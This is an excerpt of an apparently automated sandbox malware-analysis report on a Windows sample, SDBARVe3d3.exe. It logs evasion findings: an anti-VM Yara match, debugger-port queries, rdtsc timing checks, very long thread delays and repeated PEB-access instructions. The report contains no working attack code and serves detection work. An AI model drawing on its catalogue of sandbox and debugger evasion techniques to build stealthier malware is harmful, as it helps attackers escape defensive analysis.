                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: SDBARVe3d3.exe PID: 7532, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeMemory allocated: 2B00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeMemory allocated: 8000000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeMemory allocated: 9000000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeMemory allocated: 91C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeMemory allocated: A1C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0176096E rdtsc 2_2_0176096E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 9836Jump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\fc.exeAPI coverage: 3.2 %
                Source: C:\Users\user\Desktop\SDBARVe3d3.exe TID: 7552Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\fc.exe TID: 8148Thread sleep count: 137 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\fc.exe TID: 8148Thread sleep time: -274000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\fc.exe TID: 8148Thread sleep count: 9836 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\fc.exe TID: 8148Thread sleep time: -19672000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe TID: 8176Thread sleep time: -80000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe TID: 8176Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe TID: 8176Thread sleep time: -51000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe TID: 8176Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe TID: 8176Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\fc.exeCode function: 7_2_02A1C500 FindFirstFileW,FindNextFileW,FindClose,7_2_02A1C500
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: wPGxKDFwovcH.exe, 00000008.00000002.4134483767.0000000000DAF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
                Source: fc.exe, 00000007.00000002.4133667940.0000000002B70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB bxL
                Source: firefox.exe, 00000009.00000002.2408227043.00000228AF90C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\fc.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0176096E rdtsc 2_2_0176096E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_00417793 LdrLoadDll,2_2_00417793
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F4164 mov eax, dword ptr fs:[00000030h]2_2_017F4164
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F4164 mov eax, dword ptr fs:[00000030h]2_2_017F4164
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B8158 mov eax, dword ptr fs:[00000030h]2_2_017B8158
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726154 mov eax, dword ptr fs:[00000030h]2_2_01726154
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726154 mov eax, dword ptr fs:[00000030h]2_2_01726154
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171C156 mov eax, dword ptr fs:[00000030h]2_2_0171C156
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h]2_2_017B4144
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h]2_2_017B4144
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B4144 mov ecx, dword ptr fs:[00000030h]2_2_017B4144
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h]2_2_017B4144
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B4144 mov eax, dword ptr fs:[00000030h]2_2_017B4144
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01750124 mov eax, dword ptr fs:[00000030h]2_2_01750124
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CA118 mov ecx, dword ptr fs:[00000030h]2_2_017CA118
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CA118 mov eax, dword ptr fs:[00000030h]2_2_017CA118
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CA118 mov eax, dword ptr fs:[00000030h]2_2_017CA118
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CA118 mov eax, dword ptr fs:[00000030h]2_2_017CA118
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E0115 mov eax, dword ptr fs:[00000030h]2_2_017E0115
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov eax, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE10E mov ecx, dword ptr fs:[00000030h]2_2_017CE10E
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017501F8 mov eax, dword ptr fs:[00000030h]2_2_017501F8
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017F61E5 mov eax, dword ptr fs:[00000030h]2_2_017F61E5
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h]2_2_0179E1D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h]2_2_0179E1D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0179E1D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h]2_2_0179E1D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0179E1D0 mov eax, dword ptr fs:[00000030h]2_2_0179E1D0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E61C3 mov eax, dword ptr fs:[00000030h]2_2_017E61C3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E61C3 mov eax, dword ptr fs:[00000030h]2_2_017E61C3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A019F mov eax, dword ptr fs:[00000030h]2_2_017A019F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A019F mov eax, dword ptr fs:[00000030h]2_2_017A019F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A019F mov eax, dword ptr fs:[00000030h]2_2_017A019F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A019F mov eax, dword ptr fs:[00000030h]2_2_017A019F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171A197 mov eax, dword ptr fs:[00000030h]2_2_0171A197
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171A197 mov eax, dword ptr fs:[00000030h]2_2_0171A197
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171A197 mov eax, dword ptr fs:[00000030h]2_2_0171A197
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01760185 mov eax, dword ptr fs:[00000030h]2_2_01760185
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DC188 mov eax, dword ptr fs:[00000030h]2_2_017DC188
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DC188 mov eax, dword ptr fs:[00000030h]2_2_017DC188
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C4180 mov eax, dword ptr fs:[00000030h]2_2_017C4180
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C4180 mov eax, dword ptr fs:[00000030h]2_2_017C4180
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174C073 mov eax, dword ptr fs:[00000030h]2_2_0174C073
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01722050 mov eax, dword ptr fs:[00000030h]2_2_01722050
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A6050 mov eax, dword ptr fs:[00000030h]2_2_017A6050
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B6030 mov eax, dword ptr fs:[00000030h]2_2_017B6030
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171A020 mov eax, dword ptr fs:[00000030h]2_2_0171A020
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171C020 mov eax, dword ptr fs:[00000030h]2_2_0171C020
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E016 mov eax, dword ptr fs:[00000030h]2_2_0173E016
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E016 mov eax, dword ptr fs:[00000030h]2_2_0173E016
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E016 mov eax, dword ptr fs:[00000030h]2_2_0173E016
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E016 mov eax, dword ptr fs:[00000030h]2_2_0173E016
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A4000 mov ecx, dword ptr fs:[00000030h]2_2_017A4000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]2_2_017C2000
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171C0F0 mov eax, dword ptr fs:[00000030h]2_2_0171C0F0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017620F0 mov ecx, dword ptr fs:[00000030h]2_2_017620F0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0171A0E3
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A60E0 mov eax, dword ptr fs:[00000030h]2_2_017A60E0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017280E9 mov eax, dword ptr fs:[00000030h]2_2_017280E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A20DE mov eax, dword ptr fs:[00000030h]2_2_017A20DE
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E60B8 mov eax, dword ptr fs:[00000030h]2_2_017E60B8
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017E60B8 mov ecx, dword ptr fs:[00000030h]2_2_017E60B8
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017B80A8 mov eax, dword ptr fs:[00000030h]2_2_017B80A8
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172208A mov eax, dword ptr fs:[00000030h]2_2_0172208A
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C437C mov eax, dword ptr fs:[00000030h]2_2_017C437C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A035C mov eax, dword ptr fs:[00000030h]2_2_017A035C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A035C mov eax, dword ptr fs:[00000030h]2_2_017A035C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A035C mov eax, dword ptr fs:[00000030h]2_2_017A035C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A035C mov ecx, dword ptr fs:[00000030h]2_2_017A035C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A035C mov eax, dword ptr fs:[00000030h]2_2_017A035C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A035C mov eax, dword ptr fs:[00000030h]2_2_017A035C
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017EA352 mov eax, dword ptr fs:[00000030h]2_2_017EA352
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C8350 mov ecx, dword ptr fs:[00000030h]2_2_017C8350
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]2_2_017A2349
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171C310 mov ecx, dword ptr fs:[00000030h]2_2_0171C310
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01740310 mov ecx, dword ptr fs:[00000030h]2_2_01740310
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175A30B mov eax, dword ptr fs:[00000030h]2_2_0175A30B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175A30B mov eax, dword ptr fs:[00000030h]2_2_0175A30B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0175A30B mov eax, dword ptr fs:[00000030h]2_2_0175A30B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E3F0 mov eax, dword ptr fs:[00000030h]2_2_0173E3F0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E3F0 mov eax, dword ptr fs:[00000030h]2_2_0173E3F0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0173E3F0 mov eax, dword ptr fs:[00000030h]2_2_0173E3F0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017563FF mov eax, dword ptr fs:[00000030h]2_2_017563FF
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]2_2_017303E9
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE3DB mov eax, dword ptr fs:[00000030h]2_2_017CE3DB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE3DB mov eax, dword ptr fs:[00000030h]2_2_017CE3DB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE3DB mov ecx, dword ptr fs:[00000030h]2_2_017CE3DB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017CE3DB mov eax, dword ptr fs:[00000030h]2_2_017CE3DB
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C43D4 mov eax, dword ptr fs:[00000030h]2_2_017C43D4
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017C43D4 mov eax, dword ptr fs:[00000030h]2_2_017C43D4
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DC3CD mov eax, dword ptr fs:[00000030h]2_2_017DC3CD
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]2_2_0172A3C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]2_2_0172A3C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]2_2_0172A3C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]2_2_0172A3C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]2_2_0172A3C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]2_2_0172A3C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017283C0 mov eax, dword ptr fs:[00000030h]2_2_017283C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017283C0 mov eax, dword ptr fs:[00000030h]2_2_017283C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017283C0 mov eax, dword ptr fs:[00000030h]2_2_017283C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017283C0 mov eax, dword ptr fs:[00000030h]2_2_017283C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A63C0 mov eax, dword ptr fs:[00000030h]2_2_017A63C0
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01718397 mov eax, dword ptr fs:[00000030h]2_2_01718397
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01718397 mov eax, dword ptr fs:[00000030h]2_2_01718397
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01718397 mov eax, dword ptr fs:[00000030h]2_2_01718397
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171E388 mov eax, dword ptr fs:[00000030h]2_2_0171E388
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171E388 mov eax, dword ptr fs:[00000030h]2_2_0171E388
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171E388 mov eax, dword ptr fs:[00000030h]2_2_0171E388
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174438F mov eax, dword ptr fs:[00000030h]2_2_0174438F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0174438F mov eax, dword ptr fs:[00000030h]2_2_0174438F
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]2_2_017D0274
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01724260 mov eax, dword ptr fs:[00000030h]2_2_01724260
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01724260 mov eax, dword ptr fs:[00000030h]2_2_01724260
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01724260 mov eax, dword ptr fs:[00000030h]2_2_01724260
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171826B mov eax, dword ptr fs:[00000030h]2_2_0171826B
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_0171A250 mov eax, dword ptr fs:[00000030h]2_2_0171A250
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_01726259 mov eax, dword ptr fs:[00000030h]2_2_01726259
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DA250 mov eax, dword ptr fs:[00000030h]2_2_017DA250
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017DA250 mov eax, dword ptr fs:[00000030h]2_2_017DA250
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A8243 mov eax, dword ptr fs:[00000030h]2_2_017A8243
                Source: C:\Users\user\Desktop\SDBARVe3d3.exeCode function: 2_2_017A8243 mov ecx, dword ptr fs:[00000030h]2_2_017A8243
